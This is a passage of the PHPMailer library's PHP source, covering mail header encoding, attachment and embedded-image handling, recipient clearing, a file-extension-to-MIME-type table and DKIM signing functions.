        if ($matchcount == 0) {
            return ($str);
        }

        $maxlen = 75 - 7 - strlen($this->CharSet);
        // Try to select the encoding which should produce the shortest output
        if ($matchcount > strlen($str) / 3) {
            // More than a third of the content will need encoding, so B encoding will be most efficient
            $encoding = 'B';
            if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) {
                // Use a custom function which correctly encodes and wraps long
                // multibyte strings without breaking lines within a character
                $encoded = $this->base64EncodeWrapMB($str, "\n");
            } else {
                $encoded = base64_encode($str);
                $maxlen -= $maxlen % 4;
                $encoded = trim(chunk_split($encoded, $maxlen, "\n"));
            }
        } else {
            $encoding = 'Q';
            $encoded = $this->encodeQ($str, $position);
            $encoded = $this->wrapText($encoded, $maxlen, true);
            $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
        }

        $encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded);
        $encoded = trim(str_replace("\n", $this->LE, $encoded));

        return $encoded;
    }

    /**
     * Check if a string contains multi-byte characters.
     * @access public
     * @param string $str multi-byte text to wrap encode
     * @return boolean
     */
    public function hasMultiBytes($str)
    {
        if (function_exists('mb_strlen')) {
            return (strlen($str) > mb_strlen($str, $this->CharSet));
        } else { // Assume no multibytes (we can't handle without mbstring functions anyway)
            return false;
        }
    }

    /**
     * Does a string contain any 8-bit chars (in any charset)?
     * @param string $text
     * @return boolean
     */
    public function has8bitChars($text)
    {
        return (boolean)preg_match('/[\x80-\xFF]/', $text);
    }

    /**
     * Encode and wrap long multibyte strings for mail headers
     * without breaking lines within a character.
     * Adapted from a function by paravoid
     * @link http://www.php.net/manual/en/function.mb-encode-mimeheader.php#60283
     * @access public
     * @param string $str multi-byte text to wrap encode
     * @param string $linebreak string to use as linefeed/end-of-line
     * @return string
     */
    public function base64EncodeWrapMB($str, $linebreak = null)
    {
        $start = '=?' . $this->CharSet . '?B?';
        $end = '?=';
        $encoded = '';
        if ($linebreak === null) {
            $linebreak = $this->LE;
        }

        $mb_length = mb_strlen($str, $this->CharSet);
        // Each line must have length <= 75, including $start and $end
        $length = 75 - strlen($start) - strlen($end);
        // Average multi-byte ratio
        $ratio = $mb_length / strlen($str);
        // Base64 has a 4:3 ratio
        $avgLength = floor($length * $ratio * .75);

        for ($i = 0; $i < $mb_length; $i += $offset) {
            $lookBack = 0;
            do {
                $offset = $avgLength - $lookBack;
                $chunk = mb_substr($str, $i, $offset, $this->CharSet);
                $chunk = base64_encode($chunk);
                $lookBack++;
            } while (strlen($chunk) > $length);
            $encoded .= $chunk . $linebreak;
        }

        // Chomp the last linefeed
        $encoded = substr($encoded, 0, -strlen($linebreak));
        return $encoded;
    }

    /**
     * Encode a string in quoted-printable format.
     * According to RFC2045 section 6.7.
     * @access public
     * @param string $string The text to encode
     * @param integer $line_max Number of chars allowed on a line before wrapping
     * @return string
     * @link http://www.php.net/manual/en/function.quoted-printable-decode.php#89417 Adapted from this comment
     */
    public function encodeQP($string, $line_max = 76)
    {
        // Use native function if it's available (>= PHP5.3)
        if (function_exists('quoted_printable_encode')) {
            return quoted_printable_encode($string);
        }
        // Fall back to a pure PHP implementation
        $string = str_replace(
            array('%20', '%0D%0A.', '%0D%0A', '%'),
            array(' ', "\r\n=2E", "\r\n", '='),
            rawurlencode($string)
        );
        return preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
    }

    /**
     * Backward compatibility wrapper for an old QP encoding function that was removed.
     * @see PHPMailer::encodeQP()
     * @access public
     * @param string $string
     * @param integer $line_max
     * @param boolean $space_conv
     * @return string
     * @deprecated Use encodeQP instead.
     */
    public function encodeQPphp(
        $string,
        $line_max = 76,
        /** @noinspection PhpUnusedParameterInspection */ $space_conv = false
    ) {
        return $this->encodeQP($string, $line_max);
    }

    /**
     * Encode a string using Q encoding.
     * @link http://tools.ietf.org/html/rfc2047
     * @param string $str the text to encode
     * @param string $position Where the text is going to be used, see the RFC for what that means
     * @access public
     * @return string
     */
    public function encodeQ($str, $position = 'text')
    {
        // There should not be any EOL in the string
        $pattern = '';
        $encoded = str_replace(array("\r", "\n"), '', $str);
        switch (strtolower($position)) {
            case 'phrase':
                // RFC 2047 section 5.3
                $pattern = '^A-Za-z0-9!*+\/ -';
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                // RFC 2047 section 5.2
                $pattern = '\(\)"';
                // intentional fall-through
                // for this reason we build the $pattern without including delimiters and []
            case 'text':
            default:
                // RFC 2047 section 5.1
                // Replace every high ascii, control, =, ? and _ characters
                $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
                break;
        }
        $matches = array();
        if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {
            // If the string contains an '=', make sure it's the first thing we replace
            // so as to avoid double-encoding
            $eqkey = array_search('=', $matches[0]);
            if (false !== $eqkey) {
                unset($matches[0][$eqkey]);
                array_unshift($matches[0], '=');
            }
            foreach (array_unique($matches[0]) as $char) {
                $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
            }
        }
        // Replace every spaces to _ (more readable than =20)
        return str_replace(' ', '_', $encoded);
    }

    /**
     * Add a string or binary attachment (non-filesystem).
     * This method can be used to attach ascii or binary data,
     * such as a BLOB record from a database.
     * @param string $string String attachment data.
     * @param string $filename Name of the attachment.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File extension (MIME) type.
     * @param string $disposition Disposition to use
     * @return void
     */
    public function addStringAttachment(
        $string,
        $filename,
        $encoding = 'base64',
        $type = '',
        $disposition = 'attachment'
    ) {
        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($filename);
        }
        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $filename,
            2 => basename($filename),
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => 0
        );
    }

    /**
     * Add an embedded (inline) attachment from a file.
     * This can include images, sounds, and just about any other document type.
     * These differ from 'regular' attachments in that they are intended to be
     * displayed inline with the message, not just attached for download.
     * This is used in HTML messages that embed the images
     * the HTML refers to using the $cid value.
     * @param string $path Path to the attachment.
     * @param string $cid Content ID of the attachment; Use this to reference
     *        the content when using an embedded image in HTML.
     * @param string $name Overrides the attachment name.
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type File MIME type.
     * @param string $disposition Disposition to use
     * @return boolean True on successfully adding an attachment
     */
    public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
    {
        if (!@is_file($path)) {
            $this->setError($this->lang('file_access') . $path);
            return false;
        }

        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($path);
        }

        $filename = basename($path);
        if ($name == '') {
            $name = $filename;
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $path,
            1 => $filename,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => false, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }

    /**
     * Add an embedded stringified attachment.
     * This can include images, sounds, and just about any other document type.
     * Be sure to set the $type to an image type for images:
     * JPEG images use 'image/jpeg', GIF uses 'image/gif', PNG uses 'image/png'.
     * @param string $string The attachment binary data.
     * @param string $cid Content ID of the attachment; Use this to reference
     *        the content when using an embedded image in HTML.
     * @param string $name
     * @param string $encoding File encoding (see $Encoding).
     * @param string $type MIME type.
     * @param string $disposition Disposition to use
     * @return boolean True on successfully adding an attachment
     */
    public function addStringEmbeddedImage(
        $string,
        $cid,
        $name = '',
        $encoding = 'base64',
        $type = '',
        $disposition = 'inline'
    ) {
        // If a MIME type is not specified, try to work it out from the name
        if ($type == '' and !empty($name)) {
            $type = self::filenameToType($name);
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $name,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }

    /**
     * Check if an inline attachment is present.
     * @access public
     * @return boolean
     */
    public function inlineImageExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'inline') {
                return true;
            }
        }
        return false;
    }

    /**
     * Check if an attachment (non-inline) is present.
     * @return boolean
     */
    public function attachmentExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'attachment') {
                return true;
            }
        }
        return false;
    }

    /**
     * Check if this message has an alternative body set.
     * @return boolean
     */
    public function alternativeExists()
    {
        return !empty($this->AltBody);
    }

    /**
     * Clear queued addresses of given kind.
     * @access protected
     * @param string $kind 'to', 'cc', or 'bcc'
     * @return void
     */
    public function clearQueuedAddresses($kind)
    {
        $RecipientsQueue = $this->RecipientsQueue;
        foreach ($RecipientsQueue as $address => $params) {
            if ($params[0] == $kind) {
                unset($this->RecipientsQueue[$address]);
            }
        }
    }

    /**
     * Clear all To recipients.
     * @return void
     */
    public function clearAddresses()
    {
        foreach ($this->to as $to) {
            unset($this->all_recipients[strtolower($to[0])]);
        }
        $this->to = array();
        $this->clearQueuedAddresses('to');
    }

    /**
     * Clear all CC recipients.
     * @return void
     */
    public function clearCCs()
    {
        foreach ($this->cc as $cc) {
            unset($this->all_recipients[strtolower($cc[0])]);
        }
        $this->cc = array();
        $this->clearQueuedAddresses('cc');
    }

    /**
     * Clear all BCC recipients.
     * @return void
     */
    public function clearBCCs()
    {
        foreach ($this->bcc as $bcc) {
            unset($this->all_recipients[strtolower($bcc[0])]);
        }
        $this->bcc = array();
        $this->clearQueuedAddresses('bcc');
    }

    /**
     * Clear all ReplyTo recipients.
     * @return void
     */
    public function clearReplyTos()
    {
        $this->ReplyTo = array();
        $this->ReplyToQueue = array();
    }

    /**
     * Clear all recipient types.
     * @return void
     */
    public function clearAllRecipients()
    {
        $this->to = array();
        $this->cc = array();
        $this->bcc = array();
        $this->all_recipients = array();
        $this->RecipientsQueue = array();
    }

    /**
     * Clear all filesystem, string, and binary attachments.
     * @return void
     */
    public function clearAttachments()
    {
        $this->attachment = array();
    }

    /**
     * Clear all custom headers.
     * @return void
     */
    public function clearCustomHeaders()
    {
        $this->CustomHeader = array();
    }

    /**
     * Add an error message to the error container.
     * @access protected
     * @param string $msg
     * @return void
     */
    protected function setError($msg)
    {
        $this->error_count++;
        if ($this->Mailer == 'smtp' and !is_null($this->smtp)) {
            $lasterror = $this->smtp->getError();
            if (!empty($lasterror['error'])) {
                $msg .= $this->lang('smtp_error') . $lasterror['error'];
                if (!empty($lasterror['detail'])) {
                    $msg .= ' Detail: '. $lasterror['detail'];
                }
                if (!empty($lasterror['smtp_code'])) {
                    $msg .= ' SMTP code: ' . $lasterror['smtp_code'];
                }
                if (!empty($lasterror['smtp_code_ex'])) {
                    $msg .= ' Additional SMTP info: ' . $lasterror['smtp_code_ex'];
                }
            }
        }
        $this->ErrorInfo = $msg;
    }

    /**
     * Return an RFC 822 formatted date.
     * @access public
     * @return string
     * @static
     */
    public static function rfcDate()
    {
        // Set the time zone to whatever the default is to avoid 500 errors
        // Will default to UTC if it's not set properly in php.ini
        date_default_timezone_set(@date_default_timezone_get());
        return date('D, j M Y H:i:s O');
    }

    /**
     * Get the server hostname.
     * Returns 'localhost.localdomain' if unknown.
     * @access protected
     * @return string
     */
    protected function serverHostname()
    {
        $result = 'localhost.localdomain';
        if (!empty($this->Hostname)) {
            $result = $this->Hostname;
        } elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {
            $result = $_SERVER['SERVER_NAME'];
        } elseif (function_exists('gethostname') && gethostname() !== false) {
            $result = gethostname();
        } elseif (php_uname('n') !== false) {
            $result = php_uname('n');
        }
        return $result;
    }

    /**
     * Get an error message in the current language.
     * @access protected
     * @param string $key
     * @return string
     */
    protected function lang($key)
    {
        if (count($this->language) < 1) {
            $this->setLanguage('en'); // set the default language
        }

        if (array_key_exists($key, $this->language)) {
            if ($key == 'smtp_connect_failed') {
                //Include a link to troubleshooting docs on SMTP connection failure
                //this is by far the biggest cause of support questions
                //but it's usually not PHPMailer's fault.
                return $this->language[$key] . ' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting';
            }
            return $this->language[$key];
        } else {
            //Return the key as a fallback
            return $key;
        }
    }

    /**
     * Check if an error occurred.
     * @access public
     * @return boolean True if an error did occur.
     */
    public function isError()
    {
        return ($this->error_count > 0);
    }

    /**
     * Ensure consistent line endings in a string.
     * Changes every end of line from CRLF, CR or LF to $this->LE.
     * @access public
     * @param string $str String to fixEOL
     * @return string
     */
    public function fixEOL($str)
    {
        // Normalise to \n
        $nstr = str_replace(array("\r\n", "\r"), "\n", $str);
        // Now convert LE as needed
        if ($this->LE !== "\n") {
            $nstr = str_replace("\n", $this->LE, $nstr);
        }
        return $nstr;
    }

    /**
     * Add a custom header.
     * $name value can be overloaded to contain
     * both header name and value (name:value)
     * @access public
     * @param string $name Custom header name
     * @param string $value Header value
     * @return void
     */
    public function addCustomHeader($name, $value = null)
    {
        if ($value === null) {
            // Value passed in as name:value
            $this->CustomHeader[] = explode(':', $name, 2);
        } else {
            $this->CustomHeader[] = array($name, $value);
        }
    }

    /**
     * Returns all custom headers.
     * @return array
     */
    public function getCustomHeaders()
    {
        return $this->CustomHeader;
    }

    /**
     * Create a message from an HTML string.
     * Automatically makes modifications for inline images and backgrounds
     * and creates a plain-text version by converting the HTML.
     * Overwrites any existing values in $this->Body and $this->AltBody
     * @access public
     * @param string $message HTML message string
     * @param string $basedir baseline directory for path
     * @param boolean|callable $advanced Whether to use the internal HTML to text converter
     *    or your own custom converter @see PHPMailer::html2text()
     * @return string $message
     */
    public function msgHTML($message, $basedir = '', $advanced = false)
    {
        preg_match_all('/(src|background)=["\'](.*)["\']/Ui', $message, $images);
        if (array_key_exists(2, $images)) {
            foreach ($images[2] as $imgindex => $url) {
                // Convert data URIs into embedded images
                if (preg_match('#^data:(image[^;,]*)(;base64)?,#', $url, $match)) {
                    $data = substr($url, strpos($url, ','));
                    if ($match[2]) {
                        $data = base64_decode($data);
                    } else {
                        $data = rawurldecode($data);
                    }
                    $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
                    if ($this->addStringEmbeddedImage($data, $cid, 'embed' . $imgindex, 'base64', $match[1])) {
                        $message = str_replace(
                            $images[0][$imgindex],
                            $images[1][$imgindex] . '="cid:' . $cid . '"',
                            $message
                        );
                    }
                } elseif (substr($url, 0, 4) !== 'cid:' && !preg_match('#^[A-z]+://#', $url)) {
                    // Do not change urls for absolute images (thanks to corvuscorax)
                    // Do not change urls that are already inline images
                    $filename = basename($url);
                    $directory = dirname($url);
                    if ($directory == '.') {
                        $directory = '';
                    }
                    $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2
                    if (strlen($basedir) > 1 && substr($basedir, -1) != '/') {
                        $basedir .= '/';
                    }
                    if (strlen($directory) > 1 && substr($directory, -1) != '/') {
                        $directory .= '/';
                    }
                    if ($this->addEmbeddedImage(
                        $basedir . $directory . $filename,
                        $cid,
                        $filename,
                        'base64',
                        self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION))
                    )
                    ) {
                        $message = preg_replace(
                            '/' . $images[1][$imgindex] . '=["\']' . preg_quote($url, '/') . '["\']/Ui',
                            $images[1][$imgindex] . '="cid:' . $cid . '"',
                            $message
                        );
                    }
                }
            }
        }
        $this->isHTML(true);
        // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better
        $this->Body = $this->normalizeBreaks($message);
        $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced));
        if (empty($this->AltBody)) {
            $this->AltBody = 'To view this email message, open it in a program that understands HTML!' .
                self::CRLF . self::CRLF;
        }
        return $this->Body;
    }

    /**
     * Convert an HTML string into plain text.
     * This is used by msgHTML().
     * Note - older versions of this function used a bundled advanced converter
     * which was been removed for license reasons in #232
     * Example usage:
     * <code>
     * // Use default conversion
     * $plain = $mail->html2text($html);
     * // Use your own custom converter
     * $plain = $mail->html2text($html, function($html) {
     *     $converter = new MyHtml2text($html);
     *     return $converter->get_text();
     * });
     * </code>
     * @param string $html The HTML text to convert
     * @param boolean|callable $advanced Any boolean value to use the internal converter,
     *   or provide your own callable for custom conversion.
     * @return string
     */
    public function html2text($html, $advanced = false)
    {
        if (is_callable($advanced)) {
            return call_user_func($advanced, $html);
        }
        return html_entity_decode(
            trim(strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', '', $html))),
            ENT_QUOTES,
            $this->CharSet
        );
    }

    /**
     * Get the MIME type for a file extension.
     * @param string $ext File extension
     * @access public
     * @return string MIME type of file.
     * @static
     */
    public static function _mime_types($ext = '')
    {
        $mimes = array(
            'xl'    => 'application/excel',
            'js'    => 'application/javascript',
            'hqx'   => 'application/mac-binhex40',
            'cpt'   => 'application/mac-compactpro',
            'bin'   => 'application/macbinary',
            'doc'   => 'application/msword',
            'word'  => 'application/msword',
            'xlsx'  => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
            'xltx'  => 'application/vnd.openxmlformats-officedocument.spreadsheetml.template',
            'potx'  => 'application/vnd.openxmlformats-officedocument.presentationml.template',
            'ppsx'  => 'application/vnd.openxmlformats-officedocument.presentationml.slideshow',
            'pptx'  => 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
            'sldx'  => 'application/vnd.openxmlformats-officedocument.presentationml.slide',
            'docx'  => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
            'dotx'  => 'application/vnd.openxmlformats-officedocument.wordprocessingml.template',
            'xlam'  => 'application/vnd.ms-excel.addin.macroEnabled.12',
            'xlsb'  => 'application/vnd.ms-excel.sheet.binary.macroEnabled.12',
            'class' => 'application/octet-stream',
            'dll'   => 'application/octet-stream',
            'dms'   => 'application/octet-stream',
            'exe'   => 'application/octet-stream',
            'lha'   => 'application/octet-stream',
            'lzh'   => 'application/octet-stream',
            'psd'   => 'application/octet-stream',
            'sea'   => 'application/octet-stream',
            'so'    => 'application/octet-stream',
            'oda'   => 'application/oda',
            'pdf'   => 'application/pdf',
            'ai'    => 'application/postscript',
            'eps'   => 'application/postscript',
            'ps'    => 'application/postscript',
            'smi'   => 'application/smil',
            'smil'  => 'application/smil',
            'mif'   => 'application/vnd.mif',
            'xls'   => 'application/vnd.ms-excel',
            'ppt'   => 'application/vnd.ms-powerpoint',
            'wbxml' => 'application/vnd.wap.wbxml',
            'wmlc'  => 'application/vnd.wap.wmlc',
            'dcr'   => 'application/x-director',
            'dir'   => 'application/x-director',
            'dxr'   => 'application/x-director',
            'dvi'   => 'application/x-dvi',
            'gtar'  => 'application/x-gtar',
            'php3'  => 'application/x-httpd-php',
            'php4'  => 'application/x-httpd-php',
            'php'   => 'application/x-httpd-php',
            'phtml' => 'application/x-httpd-php',
            'phps'  => 'application/x-httpd-php-source',
            'swf'   => 'application/x-shockwave-flash',
            'sit'   => 'application/x-stuffit',
            'tar'   => 'application/x-tar',
            'tgz'   => 'application/x-tar',
            'xht'   => 'application/xhtml+xml',
            'xhtml' => 'application/xhtml+xml',
            'zip'   => 'application/zip',
            'mid'   => 'audio/midi',
            'midi'  => 'audio/midi',
            'mp2'   => 'audio/mpeg',
            'mp3'   => 'audio/mpeg',
            'mpga'  => 'audio/mpeg',
            'aif'   => 'audio/x-aiff',
            'aifc'  => 'audio/x-aiff',
            'aiff'  => 'audio/x-aiff',
            'ram'   => 'audio/x-pn-realaudio',
            'rm'    => 'audio/x-pn-realaudio',
            'rpm'   => 'audio/x-pn-realaudio-plugin',
            'ra'    => 'audio/x-realaudio',
            'wav'   => 'audio/x-wav',
            'bmp'   => 'image/bmp',
            'gif'   => 'image/gif',
            'jpeg'  => 'image/jpeg',
            'jpe'   => 'image/jpeg',
            'jpg'   => 'image/jpeg',
            'png'   => 'image/png',
            'tiff'  => 'image/tiff',
            'tif'   => 'image/tiff',
            'eml'   => 'message/rfc822',
            'css'   => 'text/css',
            'html'  => 'text/html',
            'htm'   => 'text/html',
            'shtml' => 'text/html',
            'log'   => 'text/plain',
            'text'  => 'text/plain',
            'txt'   => 'text/plain',
            'rtx'   => 'text/richtext',
            'rtf'   => 'text/rtf',
            'vcf'   => 'text/vcard',
            'vcard' => 'text/vcard',
            'xml'   => 'text/xml',
            'xsl'   => 'text/xml',
            'mpeg'  => 'video/mpeg',
            'mpe'   => 'video/mpeg',
            'mpg'   => 'video/mpeg',
            'mov'   => 'video/quicktime',
            'qt'    => 'video/quicktime',
            'rv'    => 'video/vnd.rn-realvideo',
            'avi'   => 'video/x-msvideo',
            'movie' => 'video/x-sgi-movie'
        );
        if (array_key_exists(strtolower($ext), $mimes)) {
            return $mimes[strtolower($ext)];
        }
        return 'application/octet-stream';
    }

    /**
     * Map a file name to a MIME type.
     * Defaults to 'application/octet-stream', i.e.. arbitrary binary data.
     * @param string $filename A file name or full path, does not need to exist as a file
     * @return string
     * @static
     */
    public static function filenameToType($filename)
    {
        // In case the path is a URL, strip any query string before getting extension
        $qpos = strpos($filename, '?');
        if (false !== $qpos) {
            $filename = substr($filename, 0, $qpos);
        }
        $pathinfo = self::mb_pathinfo($filename);
        return self::_mime_types($pathinfo['extension']);
    }

    /**
     * Multi-byte-safe pathinfo replacement.
     * Drop-in replacement for pathinfo(), but multibyte-safe, cross-platform-safe, old-version-safe.
     * Works similarly to the one in PHP >= 5.2.0
     * @link http://www.php.net/manual/en/function.pathinfo.php#107461
     * @param string $path A filename or path, does not need to exist as a file
     * @param integer|string $options Either a PATHINFO_* constant,
     *      or a string name to return only the specified piece, allows 'filename' to work on PHP < 5.2
     * @return string|array
     * @static
     */
    public static function mb_pathinfo($path, $options = null)
    {
        $ret = array('dirname' => '', 'basename' => '', 'extension' => '', 'filename' => '');
        $pathinfo = array();
        if (preg_match('%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im', $path, $pathinfo)) {
            if (array_key_exists(1, $pathinfo)) {
                $ret['dirname'] = $pathinfo[1];
            }
            if (array_key_exists(2, $pathinfo)) {
                $ret['basename'] = $pathinfo[2];
            }
            if (array_key_exists(5, $pathinfo)) {
                $ret['extension'] = $pathinfo[5];
            }
            if (array_key_exists(3, $pathinfo)) {
                $ret['filename'] = $pathinfo[3];
            }
        }
        switch ($options) {
            case PATHINFO_DIRNAME:
            case 'dirname':
                return $ret['dirname'];
            case PATHINFO_BASENAME:
            case 'basename':
                return $ret['basename'];
            case PATHINFO_EXTENSION:
            case 'extension':
                return $ret['extension'];
            case PATHINFO_FILENAME:
            case 'filename':
                return $ret['filename'];
            default:
                return $ret;
        }
    }

    /**
     * Set or reset instance properties.
     * You should avoid this function - it's more verbose, less efficient, more error-prone and
     * harder to debug than setting properties directly.
     * Usage Example:
     * `$mail->set('SMTPSecure', 'tls');`
     *   is the same as:
     * `$mail->SMTPSecure = 'tls';`
     * @access public
     * @param string $name The property name to set
     * @param mixed $value The value to set the property to
     * @return boolean
     * @TODO Should this not be using the __set() magic function?
     */
    public function set($name, $value = '')
    {
        if (property_exists($this, $name)) {
            $this->$name = $value;
            return true;
        } else {
            $this->setError($this->lang('variable_set') . $name);
            return false;
        }
    }

    /**
     * Strip newlines to prevent header injection.
     * @access public
     * @param string $str
     * @return string
     */
    public function secureHeader($str)
    {
        return trim(str_replace(array("\r", "\n"), '', $str));
    }

    /**
     * Normalize line breaks in a string.
     * Converts UNIX LF, Mac CR and Windows CRLF line breaks into a single line break format.
     * Defaults to CRLF (for message bodies) and preserves consecutive breaks.
     * @param string $text
     * @param string $breaktype What kind of line break to use, defaults to CRLF
     * @return string
     * @access public
     * @static
     */
    public static function normalizeBreaks($text, $breaktype = "\r\n")
    {
        return preg_replace('/(\r\n|\r|\n)/ms', $breaktype, $text);
    }

    /**
     * Set the public and private key files and password for S/MIME signing.
     * @access public
     * @param string $cert_filename
     * @param string $key_filename
     * @param string $key_pass Password for private key
     * @param string $extracerts_filename Optional path to chain certificate
     */
    public function sign($cert_filename, $key_filename, $key_pass, $extracerts_filename = '')
    {
        $this->sign_cert_file = $cert_filename;
        $this->sign_key_file = $key_filename;
        $this->sign_key_pass = $key_pass;
        $this->sign_extracerts_file = $extracerts_filename;
    }

    /**
     * Quoted-Printable-encode a DKIM header.
     * @access public
     * @param string $txt
     * @return string
     */
    public function DKIM_QP($txt)
    {
        $line = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ord = ord($txt[$i]);
            if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) {
                $line .= $txt[$i];
            } else {
                $line .= '=' . sprintf('%02X', $ord);
            }
        }
        return $line;
    }

    /**
     * Generate a DKIM signature.
     * @access public
     * @param string $signHeader
     * @throws phpmailerException
     * @return string
     */
    public function DKIM_Sign($signHeader)
    {
        if (!defined('PKCS7_TEXT')) {
            if ($this->exceptions) {
                throw new phpmailerException($this->lang('extension_missing') . 'openssl');
            }
            return '';
        }
        $privKeyStr = file_get_contents($this->DKIM_private);
        if ($this->DKIM_passphrase != '') {
            $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase);
        } else {
            $privKey = $privKeyStr;
        }
        if (openssl_sign($signHeader, $signature, $privKey)) {
            return base64_encode($signature);
        }
        return '';
    }

    /**
     * Generate a DKIM canonicalization header.
     * @access public
     * @param string $signHeader Header
     * @return string
     */
    public function DKIM_HeaderC($signHeader)
    {
        $signHeader = preg_replace('/\r\n\s+/', ' ', $signHeader);
        $lines = explode("\r\n", $signHeader);
        foreach ($lines as $key => $line) {
            list($heading, $value) = explode(':', $line, 2);
            $heading = strtolower($heading);
            $value = preg_replace('/\s+/', ' ', $value); // Compress useless spaces
            $lines[$key] = $heading . ':' . trim($value); // Don't forget to remove WSP around the value
        }
        $signHeader = implode("\r\n", $lines);
        return $signHeader;
    }

    /**
     * Generate a DKIM canonicalization body.
     * @access public
     * @param string $body Message Body
     * @return string
     */
    public function DKIM_BodyC($body)
    {
        if ($body == '') {
            return "\r\n";
        }
        // stabilize line endings
        $body = str_replace("\r\n", "\n", $body);
        $body = str_replace("\n", "\r\n", $body);
        // END stabilize line endings
        while (substr($body, strlen($body) - 4, 4) == "\r\n\r\n") {
            $body = substr($body, 0, strlen($body) - 2);
        }
        return $body;
    }

    /**
     * Create the DKIM header and body in a new message header.
     * @access public
     * @param string $headers_line Header lines
     * @param string $subject Subject
     * @param string $body Body
     * @return string
     */
    public function DKIM_Add($headers_line, $subject, $body)
    {
        $DKIMsignatureType = 'rsa-sha1'; // Signature & hash algorithms
        $DKIMcanonicalization = 'relaxed/simple'; // Canonicalization of header/body
        $DKIMquery = 'dns/txt'; // Query method
        $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 - Jan 1, 1970 (UTC time zone)
        $subject_header = "Subject: $subject";
        $headers = explode($this->LE, $headers_line);
        $from_header = '';
        $to_header = '';
        $current = '';
        foreach ($headers as $header) {
            if (strpos($header, 'From:') === 0) {
                $from_header = $header;
                $current = 'from_header';
            } elseif (strpos($header, 'To:') === 0) {
                $to_header = $header;
                $current = 'to_header';
            } else {
                if (!empty($$current) && strpos($header, ' =?') === 0) {
                    $$current .= $header;
                } else {
                    $current = '';
                }
            }
        }
        $from = str_replace('|', '=7C', $this->DKIM_QP($from_header));
        $to = str_replace('|', '=7C', $this->DKIM_QP($to_header));
        $subject = str_replace(
            '|',
            '=7C',
            $this->DKIM_QP($subject_header)
        ); // Copied header fields (dkim-quoted-printable)
        $body = $this->DKIM_BodyC($body);
        $DKIMlen = strlen($body); // Length of body
        $DKIMb64 = base64_encode(pack('H*', sha1($body))); // Base64 of packed binary SHA-1 hash of body
        if ('' == $this->DKIM_identity) {
            $ident = '';
        } else {
            $ident = ' i=' . $this->DKIM_identity . ';';
        }
        $dkimhdrs = 'DKIM-Signature: v=1; a=' .
            $DKIMsignatureType . '; q=' .
            $DKIMquery . '; l=' .
            $DKIMlen . '; s=' .
            $this->DKIM_selector .
            ";\r\n" .
            "\tt=" . $DKIMtime . '; c=' . $DKIMcanonicalization . ";\r\n" .
            "\th=From:To:Subject;\r\n" .
            "\td=" . $this->DKIM_domain . ';' . $ident . "\r\n" .
            "\tz=$from\r\n" .
            "\t|$to\r\n" .
            "\t|$subject;\r\n" .
            "\tbh=" . $DKIMb64 . ";\r\n" .
            "\tb=";
        $toSign = $this->DKIM_HeaderC(
            $from_header . "\r\n" .
            $to_header . "\r\n" .
            $subject_header . "\r\n" .
            $dkimhdrs
        );
        $signed = $this->DKIM_Sign($toSign);
        return $dkimhdrs . $signed . "\r\n";
    }

    /**
     * Detect if a string contains a line longer than the maximum line length allowed.
     * @param string $str
     * @return boolean
     * @static
     */
    public static function hasLineLongerThanMax($str)
    {
        //+2 to include CRLF line break for a 1000 total
        return (boolean)preg_match('/^(.{'.(self::MAX_LINE_LENGTH + 2).',})/m', $str);
    }

    /**
     * Allows for public read access to 'to' property.
     * @note: Before the send() call, queued addresses (i.e. with IDN) are not yet included.
     * @access public
     * @return array
     */
    public function getToAddresses()
    {
        return $this->to;
    }

    /**
     * Allows for public read access to 'cc' property.
     * @note: Before the send() call, queued addresses (i.e. with IDN) are not yet included.
     * @access public
     * @return array
     */
    public function getCcAddresses()
    {
        return $this->cc;
    }

    /**
     * Allows for public read access to 'bcc' property.
     * @note: Before the send() call, queued addresses (i.e. with IDN) are not yet included.
     * @access public
     * @return array
     */
    public function getBccAddresses()
    {
        return $this->bcc;
    }

    /**
     * Allows for public read access to 'ReplyTo' property.
     * @note: Before the send() call, queued addresses (i.e. with IDN) are not yet included.
     * @access public
     * @return array
     */
    public function getReplyToAddresses()
    {
        return $this->ReplyTo;
    }

    /**
